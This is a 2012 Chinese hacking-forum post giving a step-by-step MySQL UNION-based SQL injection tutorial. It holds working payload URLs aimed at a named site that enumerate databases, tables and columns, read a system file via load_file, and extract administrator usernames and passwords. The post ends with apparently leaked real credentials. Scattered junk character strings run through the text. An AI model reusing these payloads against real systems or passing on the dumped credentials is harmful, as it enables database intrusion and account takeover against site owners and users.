找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2289|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
  p! M8 q: m, C# K6 ~但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
1 }+ Y% @0 x# N  U1 k6 d" M  D' R% D) Q2 H8 O% ]  z

; j: K6 o; c1 t. A3 O优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入! f* I& ~' ?1 N$ M( b0 {; r

" v" T) r# N- I缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
" D2 ~2 v( R; s3 `. G8 N5 h9 ?. t6 d" C) O
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示, t2 @6 l; A1 u
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等4 b( p+ P6 e" N( A" T; p4 s
7 q1 ]5 Z0 M. S& o+ D' t
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
" a  b/ f6 l+ Z. {/ y2 e3 o, G# G4 O
' L6 g( l1 c7 B6 q4 i: S- F读出所有库:$ G# r, b' w' h; M
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA% k2 v9 w* s+ x4 N2 Y& Z

6 M) {$ P* S& I/ t$ O* |, A1 O3 M) h" [: b) e
, {1 J2 w- E$ J
读出所有表:! m) v( g$ x: O! H8 U: `2 U
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
9 E+ q0 c- d1 Q8 M3 A3 O
' n' S  g% e% \9 j) U9 B- t读出所有表字段:# m3 J1 ?: l% ]; ]9 l
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
& F( x/ P/ @1 V& P  r*/ (97,100,109,105,110)为admin的ascii码 依次类推- S& m, J5 v* H' R

2 @1 E8 \1 {. Y) F读出所有表字段里的内容:
% x! Y# P" C! d7 ahttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
* i0 {+ I+ Q9 R! h
1 F) ^  [6 b. s* {- R% \3 ^
1 @, U$ }/ ]! p' v' r, s, ]7 R" e9 ~: G) l: k% \. v/ k* t! h+ E
1 I0 J3 X5 K& r7 g0 e- ]- [) Z
5 k3 W! z, q) [

: M# E$ @% J0 Y( Z0 l' ]http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%235 c- d8 X+ T: l% u

5 _7 r" T! k$ s1 [; S) H( J! D$ m! j9 l6 p8 M' \
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
6 z7 u+ ?; Q/ i/ g
* v" \) b$ h7 j! G8 e( e' @http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
6 Z& H' o& P4 z% C$ N6 }$ F' q! f3 U

, T8 }! {- j+ W" Xhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%231 F# R4 o6 Z' }- l1 m# ^  ~; ^6 Y- i
' G( X: s% M' w

; M  ~+ T) ~$ o0 |0 p0 M        webmaster:dzb521123,simlab:simadmin20043233' p4 |( ~/ ]' n, z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表